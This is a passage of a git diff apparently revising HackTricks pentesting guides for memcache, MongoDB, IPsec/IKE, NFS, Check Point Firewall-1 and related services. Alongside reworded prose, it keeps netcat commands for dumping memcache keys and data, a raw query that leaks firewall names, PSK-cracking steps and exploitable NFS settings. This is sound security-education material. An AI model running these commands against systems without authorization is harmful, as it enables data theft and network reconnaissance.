-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
@@ -168,7 +168,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
diff --git a/network-services-pentesting/11211-memcache/README.md b/network-services-pentesting/11211-memcache/README.md
index 22ad65b94..f13e444d8 100644
--- a/network-services-pentesting/11211-memcache/README.md
+++ b/network-services-pentesting/11211-memcache/README.md
@@ -16,7 +16,10 @@ Other ways to support HackTricks:
 
 ## Protocol Information
 
-**Memcached** (pronunciation: mem-cashed, mem-cash-dee) is a general-purpose distributed [memory caching](https://en.wikipedia.org/wiki/Memory\_caching) system. It is often used to speed up dynamic database-driven websites by caching data and objects in RAM to reduce the number of times an external data source (such as a database or API) must be read. (From [wikipedia](https://en.wikipedia.org/wiki/Memcached))\
+From [wikipedia](https://en.wikipedia.org/wiki/Memcached):
+
+> **Memcached** (pronunciation: mem-cashed, mem-cash-dee) is a general-purpose distributed [memory caching](https://en.wikipedia.org/wiki/Memory\_caching) system. It is often used to speed up dynamic database-driven websites by caching data and objects in RAM to reduce the number of times an external data source (such as a database or API) must be read.
+
 Although Memcached supports SASL, most instances are **exposed without authentication**.
 
 **Default port:** 11211
@@ -30,7 +33,7 @@ PORT      STATE SERVICE
 
 ### Manual
 
-To ex-filtrate all the information saved inside a memcache instance you need to:
+To exfiltrate all the information saved inside a memcache instance you need to:
 
 1. Find **slabs** with **active items**
 2. Get the **key names** of the slabs detected before
@@ -68,136 +71,88 @@ msf > use auxiliary/gather/memcached_extractor      #Extracts saved data
 msf > use auxiliary/scanner/memcached/memcached_amp #Check is UDP DDoS amplification attack is possible 
 ```
 
-## Dumping Memcache Keys <a href="#dumping-memcache-keys" id="dumping-memcache-keys"></a>
+## **Dumping Memcache Keys**
 
-**If your memcached version is above 1.4.31, read next section for advanced method of dumping keys.**
+In the realm of memcache, a protocol that assists in organizing data by slabs, specific commands exist for inspecting the stored data, albeit with notable constraints:
 
-The memcache protocol provides [commands](https://lzone.de/articles/memcached.htm) to peek into the data that is organized by slabs (categories of data of a given size range). There are some significant limitations though:
+1. Keys can only be dumped by slab class, grouping keys of similar content size.
+2. A limit exists of one page per slab class, equating to 1MB of data.
+3. This feature is unofficial and may be discontinued at any time, as discussed in [community forums](https://groups.google.com/forum/?fromgroups=#!topic/memcached/1-T8I-RVGKM).
 
-1. You can only dump keys per slab class (keys with roughly the same content size)
-2. You can only dump one page per slab class (1MB of data)
-3. This is an unofficial feature that [might be removed anytime.](https://groups.google.com/forum/?fromgroups=#!topic/memcached/1-T8I-RVGKM)
+The limitation of only being able to dump 1MB from potentially gigabytes of data is particularly significant. However, this functionality can still offer insights into key usage patterns, depending on specific needs. For those less interested in the mechanics, a visit to the [tools section](https://lzone.de/cheat-sheet/memcached#tools) reveals utilities for comprehensive dumping. Alternatively, the process of using telnet for direct interaction with memcached setups is outlined below.
 
-The second limitation is probably the hardest because 1MB of several gigabytes is almost nothing. Still it can be useful to watch how you use a subset of your keys. But this might depend on your use case. If you don’t care about the technical details just skip to the [tools section](https://lzone.de/cheat-sheet/memcached#tools) to learn about what tools allow you to easily dump everything. Alternatively follow the following guide and try the commands [using telnet](https://lzone.de/articles/memcached.htm) against your memcached setup. **How it Works** First you need to know how memcache organizes its memory. If you start memcache with option “-vv” you see the slab classes it creates. For example
+### **How it Works**
 
-```
+Memcache's memory organization is pivotal. Initiating memcache with the "-vv" option reveals the slab classes it generates, as shown below:
+
+```bash
 $ memcached -vv
 slab class   1: chunk size        96 perslab   10922
-slab class   2: chunk size       120 perslab    8738
-slab class   3: chunk size       152 perslab    6898
-slab class   4: chunk size       192 perslab    5461
 [...]
 ```
 
-In the configuration printed above memcache will keep fit 6898 pieces of data between 121 and 152 byte in a single slab of 1MB size (6898\*152). All slabs are sized as 1MB per default. Use the following command to print all currently existing slabs:
+To display all currently existing slabs, the following command is used:
 
-```
+```bash
 stats slabs
 ```
 
-If you’ve added a single key to an empty memcached 1.4.13 with
+Adding a single key to memcached 1.4.13 illustrates how slab classes are populated and managed. For instance:
 
-```
+```bash
 set mykey 0 60 1
 1
 STORED
 ```
 
-you’ll now see the following result for the “stats slabs” command:
+Executing the "stats slabs" command post key addition yields detailed statistics about slab utilization:
 
-```
+```bash
 stats slabs
-STAT 1:chunk_size 96
-STAT 1:chunks_per_page 10922
-STAT 1:total_pages 1
-STAT 1:total_chunks 10922
-STAT 1:used_chunks 1
-STAT 1:free_chunks 0
-STAT 1:free_chunks_end 10921
-STAT 1:mem_requested 71
-STAT 1:get_hits 0
-STAT 1:cmd_set 2
-STAT 1:delete_hits 0
-STAT 1:incr_hits 0
-STAT 1:decr_hits 0
-STAT 1:cas_hits 0
-STAT 1:cas_badval 0
-STAT 1:touch_hits 0
-STAT active_slabs 1
-STAT total_malloced 1048512
-END
+[...]
 ```
 
-The example shows that we have only one active slab type #1. Our key being just one byte large fits into this as the smallest possible chunk size. The slab statistics show that currently on one page of the slab class exists and that only one chunk is used. **Most importantly it shows a counter for each write operation (set, incr, decr, cas, touch) and one for gets. Using those you can determine a hit ratio!** You can also fetch another set of infos using “stats items” with interesting counters concerning evictions and out of memory counters.
+This output reveals the active slab types, utilized chunks, and operational statistics, offering insights into the efficiency of read and write operations.
 
-```
+Another useful command, "stats items", provides data on evictions, memory constraints, and item lifecycles:
+
+```bash
 stats items
-STAT items:1:number 1
-STAT items:1:age 4
-STAT items:1:evicted 0
-STAT items:1:evicted_nonzero 0
-STAT items:1:evicted_time 0
-STAT items:1:outofmemory 0
-STAT items:1:tailrepairs 0
-STAT items:1:reclaimed 0
-STAT items:1:expired_unfetched 0
-STAT items:1:evicted_unfetched 0
-END
+[...]
 ```
 
-**What We Can Guess Already…** Given the statistics infos per slabs class we can already guess a lot of thing about the application behaviour:
+These statistics allow for educated assumptions about application caching behavior, including cache efficiency for different content sizes, memory allocation, and capacity for caching large objects.
 
-1. How is the cache ratio for different content sizes?
-   * How good is the caching of large HTML chunks?
-2. How much memory do we spend on different content sizes?
-   * How much do we spend on simple numeric counters?
-   * How much do we spend on our session data?
-   * How much do we spend on large HTML chunks?
-3. How many large objects can we cache at all?
+### **Dumping Keys**
 
-Of course to answer the questions you need to know about the cache objects of your application. **Now: How to Dump Keys?** Keys can be dumped per slabs class using the “stats cachedump” command.
+For versions prior to 1.4.31, keys are dumped by slab class using:
 
-```
+```bash
 stats cachedump <slab class> <number of items to dump>
 ```
 
-To dump our single key in class #1 run
+For example, to dump a key in class #1:
 
-```
+```bash
 stats cachedump 1 1000
 ITEM mykey [1 b; 1350677968 s]
 END
 ```
 
-The “cachedump” returns one item per line. The first number in the braces gives the size in bytes, the second the timestamp of the creation. Given the key name you can now also dump its value using
-
-```
-get mykey
-VALUE mykey 0 1
-1
-END
-```
-
-This is it: iterate over all slabs classes you want, extract the key names and if need dump there contents.
+This method iterates over slab classes, extracting and optionally dumping key values.
 
 ### **DUMPING MEMCACHE KEYS (VER 1.4.31+)**
 
-In memcache version 1.4.31 and above there is a new command for dumping memory keys in non-blocking mode (read https://github.com/memcached/memcached/wiki/ReleaseNotes1431 ). This method is safe to run in production. The output is not consistent, but good enough for finding keys, their exact expiration time (EXP) and last accessed time (LA). Because of huge output generated, it’s recommended to use ‘nc’ command. Examples:
+With memcache version 1.4.31 and above, a new, safer method for dumping keys in a production environment is introduced, utilizing non-blocking mode as detailed in the [release notes](https://github.com/memcached/memcached/wiki/ReleaseNotes1431). This approach generates extensive output, hence the recommendation to employ the 'nc' command for efficiency. Examples include:
 
-```
+```bash
 echo 'lru_crawler metadump all' | nc 127.0.0.1 11211 | head -1
-key=0dLLX%253Amemcache_test_key exp=1590718787 la=1590718487 cas=2238881166 fetch=yes
-
 echo 'lru_crawler metadump all' | nc 127.0.0.1 11211 | grep ee6ba58566e234ccbbce13f9a24f9a28
-key=VQRFX%253Aee6ba58566e234ccbbce13f9a24f9a28 exp=-1 la=1590386157 cas=1776204003 fetch=yes
-key=0dLLX%253Aee6ba58566e234ccbbce13f9a24f9a28 exp=-1 la=1590712292 cas=2225524871 fetch=yes
 ```
 
-EXP=-1 means the item never expires EXP=1590718787 (Fri May 29 02:19:47 GMT 2020) keeps the unix timestamp when the item should expire LA=1590712292 (Mon May 25 05:55:57 GMT 2020) keeps the unix timestamp when the item was last accessed
-
 ### **DUMPING TOOLS**
 
-There are different dumping tools sometimes just scripts out there that help you with printing memcache keys:
+Table [from here](https://lzone.de/blog).
 
 | Programming Languages | Tools                                                                                                                              | Functionality                                                                                                                                                          |                                                                             |         |
 | --------------------- | ---------------------------------------------------------------------------------------------------------------------------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------- | --------------------------------------------------------------------------- | ------- |
diff --git a/network-services-pentesting/27017-27018-mongodb.md b/network-services-pentesting/27017-27018-mongodb.md
index b45f02830..5d024bc07 100644
--- a/network-services-pentesting/27017-27018-mongodb.md
+++ b/network-services-pentesting/27017-27018-mongodb.md
@@ -31,8 +31,7 @@ Stay informed with the newest bug bounties launching and crucial platform update
 
 ## Basic Information
 
-MongoDB is an [open source](https://whatis.techtarget.com/definition/open-source) database management system (DBMS) that uses a document-oriented database model which supports various forms of data. (From [here](https://searchdatamanagement.techtarget.com/definition/MongoDB))
-
+**MongoDB** is an **open source** database management system that uses a **document-oriented database model** to handle diverse forms of data. It offers flexibility and scalability for managing unstructured or semi-structured data in applications like big data analytics and content management.
 **Default port:** 27017, 27018
 
 ```
@@ -110,9 +109,11 @@ grep "auth.*true" /opt/bitnami/mongodb/mongodb.conf | grep -v "^#\|noauth" #Not
 
 ## Mongo Objectid Predict
 
+Example [from here](https://techkranti.com/idor-through-mongodb-object-ids-prediction/).
+
 Mongo Object IDs are **12-byte hexadecimal** strings:
 
-![](../.gitbook/assets/id-and-objectids-in-mongodb.png)
+![http://techidiocy.com/_id-objectid-in-mongodb/](../.gitbook/assets/id-and-objectids-in-mongodb.png)
 
 For example, here’s how we can dissect an actual Object ID returned by an application: 5f2459ac9fa6dc2500314019
 
@@ -129,6 +130,8 @@ The tool [https://github.com/andresriancho/mongo-objectid-predict](https://githu
 
 If you are root you can **modify** the **mongodb.conf** file so no credentials are needed (_noauth = true_) and **login without credentials**.
 
+***
+
 <figure><img src="../../.gitbook/assets/image (1) (3) (1).png" alt=""><figcaption></figcaption></figure>
 
 Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
diff --git a/network-services-pentesting/44818-ethernetip.md b/network-services-pentesting/44818-ethernetip.md
index 1eaa1108e..a8920e5e7 100644
--- a/network-services-pentesting/44818-ethernetip.md
+++ b/network-services-pentesting/44818-ethernetip.md
@@ -17,14 +17,7 @@ Other ways to support HackTricks:
 
 # **Protocol Information**
 
-From Wikipedia article on EtherNet/IP [http://en.wikipedia.org/wiki/EtherNet/IP](http://en.wikipedia.org/wiki/EtherNet/IP)
-
-> EtherNet/IP was developed in the late 1990s by Rockwell Automation as part of Rockwell's industrial Ethernet networking solutions. Rockwell gave EtherNet/IP its moniker and handed it over to ODVA, which now manages the protocol and assures multi-vendor system interoperability by requiring adherence to established standards whenever new products that utilize the protocol are developed today.
-
-> EtherNet/IP is most commonly used in industrial automation control systems, such as for water processing plants, manufacturing facilities and utilities. Several control system vendors have developed programmable automation controllers and I/O capable of communicating via EtherNet/IP.
-
-An EtherNet/IP device is positively identified by querying TCP/44818 with a list Identities Message (0x63). The response messages will determine if it is a EtherNet/IP device and parse the information to enumerate the device.\
-From [here](https://github.com/digitalbond/Redpoint)
+EtherNet/IP is an **industrial Ethernet networking protocol** commonly used in **industrial automation control systems**. It was developed by Rockwell Automation in the late 1990s and is managed by ODVA. The protocol ensures **multi-vendor system interoperability** and is utilized in various applications such as **water processing plants**, **manufacturing facilities**, and **utilities**. To identify an EtherNet/IP device, a query is sent to **TCP/44818** with a **list Identities Message (0x63)**.
 
 **Default port:** 44818 UDP/TCP
 
diff --git a/network-services-pentesting/cassandra.md b/network-services-pentesting/cassandra.md
index 273c2ca77..e70608839 100644
--- a/network-services-pentesting/cassandra.md
+++ b/network-services-pentesting/cassandra.md
@@ -16,8 +16,9 @@ Other ways to support HackTricks:
 
 ## Basic Information
 
-Apache Cassandra is a highly scalable, high-performance distributed database designed to handle large amounts of data across many commodity servers, providing high availability with no single point of failure. It is a type of NoSQL database.\
-In several cases you will find **cassandra accepting any credentials** (as there aren't any configured) and you will be able to enumerate the database.
+**Apache Cassandra** is a **highly scalable**, **high-performance** distributed database designed to handle **large amounts of data** across many **commodity servers**, providing **high availability** with no **single point of failure**. It is a type of **NoSQL database**.
+
+In several cases, you may find that Cassandra accepts **any credentials** (as there aren't any configured) and this could potentially allow an attacker to **enumerate** the database.
 
 **Default port:** 9042,9160
 
diff --git a/network-services-pentesting/ipsec-ike-vpn-pentesting.md b/network-services-pentesting/ipsec-ike-vpn-pentesting.md
index 948e7802a..405c97fee 100644
--- a/network-services-pentesting/ipsec-ike-vpn-pentesting.md
+++ b/network-services-pentesting/ipsec-ike-vpn-pentesting.md
@@ -24,13 +24,14 @@ Find vulnerabilities that matter most so you can fix them faster. Intruder track
 
 ## Basic Information
 
-IPsec is the most commonly used technology for both gateway-to-gateway (LAN-to-LAN) and host to gateway (remote access) enterprise VPN solutions.
+**IPsec** is widely recognized as the principal technology for securing communications between networks (LAN-to-LAN) and from remote users to the network gateway (remote access), serving as the backbone for enterprise VPN solutions.
 
-**IKE is a type of ISAKMP** (Internet Security Association Key Management Protocol) implementation, which is a framework for authentication and key exchange. IKE establishes the security association (SA) between two endpoints through a three-phase process:
+The establishment of a **security association (SA)** between two points is managed by **IKE**, which operates under the umbrella of ISAKMP, a protocol designed for the authentication and key exchange. This process unfolds in several phases:
+
+- **Phase 1:** A secure channel is created between two endpoints. This is achieved through the use of a Pre-Shared Key (PSK) or certificates, employing either main mode, which involves three pairs of messages, or **aggressive mode**.
+- **Phase 1.5:** Though not mandatory, this phase, known as the Extended Authentication Phase, verifies the identity of the user attempting to connect by requiring a username and password.
+- **Phase 2:** This phase is dedicated to negotiating the parameters for securing data with **ESP** and **AH**. It allows for the use of algorithms different from those in Phase 1 to ensure **Perfect Forward Secrecy (PFS)**, enhancing security.
 
-* **Phase 1:** Establish a secure channel between 2 endpoints using a Pre-Shared Key (PSK) or certificates. It can use main mode (3 pairs of messages) or **aggresive** mode.
-* **Phase1.5:** This is optional, is called Extended Authentication Phase and authenticates the user that is trying to connect (user+password).
-* **Phase2:** Negotiates the parameter for the data security using ESP and AH. It can use a different algorithm than the one used in phase 1 (Perfect Forward Secrecy (PFS)).
 
 **Default port:** 500/udp
 
@@ -103,9 +104,9 @@ You could also try to brute force transformations with [**ikeforce**](https://gi
 ![](<../.gitbook/assets/image (109).png>)
 
 In **DH Group: 14 = 2048-bit MODP** and **15 = 3072-bit**\
-**2 = HMAC-SHA = SHA1 (in this case). The --trans format is $Enc,$Hash,$Auth,$DH**
+**2 = HMAC-SHA = SHA1 (in this case). The `--trans` format is $Enc,$Hash,$Auth,$DH**
 
-Cisco recommends avoidance of DH groups 1 and 2 in particular. The paper’s authors describe how it is likely that **nation states can decrypt IPsec sessions negotiated using weak groups via discrete log precomputation**. The hundreds of millions of dollars spent performing precomputation are amortised through the real-time decryption of any session using a weak group (1,024-bit or smaller).
+Cisco indicates to avoid using DH groups 1 and 2 because they're not strong enough. Experts believe that **countries with a lot of resources can easily break the encryption** of data that uses these weak groups. This is done by using a special method that prepares them to crack the codes quickly. Even though it costs a lot of money to set up this method, it allows these powerful countries to read the encrypted data in real time if it's using a group that's not strong (like 1,024-bit or smaller).
 
 ### Server fingerprinting
 
@@ -199,7 +200,7 @@ pip install 'pyopenssl==17.2.0' #It is old and need this version of the library
 
 ### Sniffing ID
 
-It is also possible to obtain valid usernames by sniffing the connection between the VPN client and server, as the first aggressive mode packet containing the client ID is sent in the clear (from the book **Network Security Assessment: Know Your Network**)
+(From the book **Network Security Assessment: Know Your Network**): It is also possible to obtain valid usernames by sniffing the connection between the VPN client and server, as the first aggressive mode packet containing the client ID is sent in the clear 
 
 ![](<../.gitbook/assets/image (111).png>)
 
@@ -221,7 +222,10 @@ psk-crack -d <Wordlist_path> psk.txt
 
 ## **XAuth**
 
-Most implementations use **aggressive mode IKE with a PSK to perform group authentication**, and **XAUTH to provide additional user authentication** (via Microsoft Active Directory, RADIUS, or similar). Within **IKEv2**, **EAP replaces XAUTH** to authenticate users.
+**Aggressive mode IKE** combined with a **Pre-Shared Key (PSK)** is commonly employed for **group authentication** purposes. This method is augmented by **XAuth (Extended Authentication)**, which serves to introduce an additional layer of **user authentication**. Such authentication typically leverages services like **Microsoft Active Directory**, **RADIUS**, or comparable systems.
+
+Transitioning to **IKEv2**, a notable shift is observed where **EAP (Extensible Authentication Protocol)** is utilized in lieu of **XAuth** for the purpose of authenticating users. This change underscores an evolution in authentication practices within secure communication protocols.
+
 
 ### Local network MitM to capture credentials
 
diff --git a/network-services-pentesting/nfs-service-pentesting.md b/network-services-pentesting/nfs-service-pentesting.md
index 1af273139..c2fe1c445 100644
--- a/network-services-pentesting/nfs-service-pentesting.md
+++ b/network-services-pentesting/nfs-service-pentesting.md
@@ -7,18 +7,18 @@
 * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
 
 </details>
 
 ## **Basic Information**
 
-It is a client/server system that allows users to access files across a network and treat them as if they resided in a local file directory. It has the same purpose as SMB but it cannot talk to SMB.
+**NFS** is a system designed for **client/server** that enables users to seamlessly access files over a network as though these files were located within a local directory. 
 
-The NFS protocol has **no mechanism for authentication** or **authorization**. The authorization is taken from the available information of the file system where the server is responsible for translating the **user information** supplied by the **client** to that of the **file system** and converting the corresponding authorization information as correctly as possible into the syntax required by UNIX.
+A notable aspect of this protocol is its lack of built-in **authentication** or **authorization mechanisms**. Instead, authorization relies on **file system information**, with the server tasked with accurately translating **client-provided user information** into the file system's required **authorization format**, primarily following **UNIX syntax**.
 
-The most common **authentication is via UNIX `UID`/`GID` and `group memberships`**, which is why this syntax is most likely to be applied to the NFS protocol. One problem is that the **client** and **server** do **not necessarily** have to have the **same mappings of UID/GID** to users and groups. No further checks can be made on the part of the server. This is why NFS should **only** be used with this authentication method in **trusted networks**.
+Authentication commonly relies on **UNIX `UID`/`GID` identifiers and group memberships**. However, a challenge arises due to the potential mismatch in **`UID`/`GID` mappings** between clients and servers, leaving no room for additional verification by the server. Consequently, the protocol is best suited for use within **trusted networks**, given its reliance on this method of authentication.
 
 **Default port**: 2049/TCP/UDP (except version 4, it just needs TCP or UDP).&#x20;
 
@@ -28,13 +28,13 @@ The most common **authentication is via UNIX `UID`/`GID` and `group memberships`
 
 ### Versions
 
-(From [https://academy.hackthebox.com/module/112/section/1068](https://academy.hackthebox.com/module/112/section/1068))
+- **NFSv2**: This version is recognized for its broad compatibility with various systems, marking its significance with initial operations predominantly over UDP. Being the **oldest** in the series, it laid the groundwork for future developments.
 
-| **Version** | **Features**                                                                                                                                                                                                                                                                 |
-| ----------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
-| `NFSv2`     | It is **older** but is supported by many systems and was initially operated entirely over UDP.                                                                                                                                                                               |
-| `NFSv3`     | It has more features, including variable file size and better error reporting, but is not fully compatible with NFSv2 clients.                                                                                                                                               |
-| `NFSv4`     | It includes Kerberos, works through firewalls and on the Internet, **no longer requires portmappers**, supports ACLs, applies state-based operations, and provides performance improvements and high **security**. It is also the first version to have a stateful protocol. |
+- **NFSv3**: Introduced with an array of enhancements, NFSv3 expanded on its predecessor by supporting variable file sizes and offering improved error reporting mechanisms. Despite its advancements, it faced limitations in full backward compatibility with NFSv2 clients.
+
+- **NFSv4**: A landmark version in the NFS series, NFSv4 brought forth a suite of features designed to modernize file sharing across networks. Notable improvements include the integration of Kerberos for **high security**, the capability to traverse firewalls and operate over the Internet without the need for portmappers, support for Access Control Lists (ACLs), and the introduction of state-based operations. Its performance enhancements and the adoption of a stateful protocol distinguish NFSv4 as a pivotal advancement in network file sharing technologies.
+
+Each version of NFS has been developed with the intent to address the evolving needs of network environments, progressively enhancing security, compatibility, and performance.
 
 ## Enumeration
 
@@ -94,15 +94,15 @@ To easily list, mount and change UID and GID to have access to files you can use
 
 ### Dangerous settings
 
-(From [https://academy.hackthebox.com/module/112/section/1068](https://academy.hackthebox.com/module/112/section/1068))
+- **Read and Write Permissions (`rw`):** This setting allows both reading from and writing to the file system. It's essential to consider the implications of granting such broad access.
 
-| **Option**       | **Description**                                                                                                      |
-| ---------------- | -------------------------------------------------------------------------------------------------------------------- |
-| `rw`             | Read and write permissions.                                                                                          |
-| `insecure`       | Ports above 1024 will be used.                                                                                       |
-| `nohide`         | If another file system was mounted below an exported directory, this directory is exported by its own exports entry. |
-| `no_root_squash` | All files created by root are kept with the UID/GID 0.                                                               |
-| `no_all_squash`  |                                                                                                                      |
+- **Use of Insecure Ports (`insecure`):** When enabled, this allows the system to utilize ports above 1024. The security of ports above this range can be less stringent, increasing risk.
+
+- **Visibility of Nested File Systems (`nohide`):** This configuration makes directories visible even if another file system is mounted below an exported directory. Each directory requires its own export entry for proper management.
+
+- **Root Files Ownership (`no_root_squash`):** With this setting, files created by the root user maintain their original UID/GID of 0, disregarding the principle of least privilege and potentially granting excessive permissions.
+
+- **Non-Squashing of All Users (`no_all_squash`):** This option ensures that user identities are preserved across the system, which could lead to permission and access control issues if not correctly handled.
 
 ## Privilege Escalation using NFS misconfigurations
 
@@ -119,7 +119,7 @@ Entry_1:
   Name: Notes
   Description: Notes for NFS
   Note: |
-    It is a client/server system that allows users to access files across a network and treat them as if they resided in a local file directory.
+    NFS is a system designed for client/server that enables users to seamlessly access files over a network as though these files were located within a local directory. 
 
     #apt install nfs-common
     showmount 10.10.10.180      ~or~showmount -e 10.10.10.180
@@ -144,7 +144,7 @@ Entry_2:
 * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
 
 </details>
diff --git a/network-services-pentesting/pentesting-264-check-point-firewall-1.md b/network-services-pentesting/pentesting-264-check-point-firewall-1.md
index b400ab296..b7d1ac207 100644
--- a/network-services-pentesting/pentesting-264-check-point-firewall-1.md
+++ b/network-services-pentesting/pentesting-264-check-point-firewall-1.md
@@ -15,14 +15,18 @@ Other ways to support HackTricks:
 </details>
 
 
-Module sends a query to the port **264/TCP** on **CheckPoint** **Firewall-1** firewalls to obtain the firewall name and management station \(such as SmartCenter\) name via a pre-authentication request
+It's possible to interact with **CheckPoint** **Firewall-1** firewalls to discover valuable information such as the firewall's name and the management station's name. This can be done by sending a query to the port **264/TCP**. 
 
-```text
+### Obtaining Firewall and Management Station Names
+
+Using a pre-authentication request, you can execute a module that targets the **CheckPoint Firewall-1**. The necessary commands for this operation are outlined below:
+
+```bash
 use auxiliary/gather/checkpoint_hostname
-set RHOST 10.10.xx.xx
+set RHOST 10.10.10.10
 ```
 
-Sample Output
+Upon execution, the module attempts to contact the firewall's SecuRemote Topology service. If successful, it confirms the presence of a CheckPoint Firewall and retrieves the names of both the firewall and the SmartCenter management host. Here's an example of what the output might look like:
 
 ```text
 [*] Attempting to contact Checkpoint FW1 SecuRemote Topology service...
@@ -32,21 +36,24 @@ Sample Output
 [*] Auxiliary module execution completed
 ```
 
-From: [https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html\#check-point-firewall-1-topology-port-264](https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html#check-point-firewall-1-topology-port-264)
+### Alternative Method for Hostname and ICA Name Discovery
 
-Another way to obtain the firewall's hostname and ICA name could be
+Another technique involves a direct command that sends a specific query to the firewall and parses the response to extract the firewall's hostname and ICA name. The command and its structure are as follows:
 
 ```bash
-printf '\x51\x00\x00\x00\x00\x00\x00\x21\x00\x00\x00\x0bsecuremote\x00' | nc -q 1 x.x.x.x 264 | grep -a CN | cut -c 2-
+printf '\x51\x00\x00\x00\x00\x00\x00\x21\x00\x00\x00\x0bsecuremote\x00' | nc -q 1 10.10.10.10 264 | grep -a CN | cut -c 2-
 ```
 
-Sample Output
+The output from this command provides detailed information regarding the firewall's certificate name (CN) and organization (O), as demonstrated below:
 
 ```text
 CN=Panama,O=MGMTT.srv.rxfrmi
 ```
 
-From: [https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit\_doGoviewsolutiondetails=&solutionid=sk69360](https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk69360)
+## References
+
+* [https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit\_doGoviewsolutiondetails=&solutionid=sk69360](https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk69360)
+* [https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html\#check-point-firewall-1-topology-port-264](https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html#check-point-firewall-1-topology-port-264)
 
 
 
diff --git a/network-services-pentesting/pentesting-631-internet-printing-protocol-ipp.md b/network-services-pentesting/pentesting-631-internet-printing-protocol-ipp.md
index 997e054ad..892f63ba1 100644
--- a/network-services-pentesting/pentesting-631-internet-printing-protocol-ipp.md
+++ b/network-services-pentesting/pentesting-631-internet-printing-protocol-ipp.md
@@ -17,10 +17,25 @@ Other ways to support HackTricks:
 
 # Internet Printing Protocol \(IPP\)
 
-The Internet Printing Protocol \(IPP\) is defined in RFC2910 and RFC2911. It's an extendable protocol, for example ‘IPP Everywhere’ is a candidate for a standard in mobile and cloud printing and IPP extensions for 3D printing have been released.  
-Because IPP is based on _HTTP_, it inherits all existing security features like basic/digest authentication and _SSL/TLS_ encryption. To submit a print job or to retrieve status information from the printer, an HTTP POST request is sent to the IPP server listening on **port 631/tcp**. A famous open-source IPP implementation is CUPS, which is the default printing system in many Linux distributions and OS X. Similar to LPD, IPP is a **channel** to deploy the actual data to be printed and can be abused as a carrier for malicious PostScript or PJL files.
+The **Internet Printing Protocol (IPP)**, as specified in **RFC2910** and **RFC2911**, serves as a foundation for printing over the internet. Its capability to be extended is showcased by developments like **IPP Everywhere**, which aims to standardize mobile and cloud printing, and the introduction of extensions for **3D printing**.
 
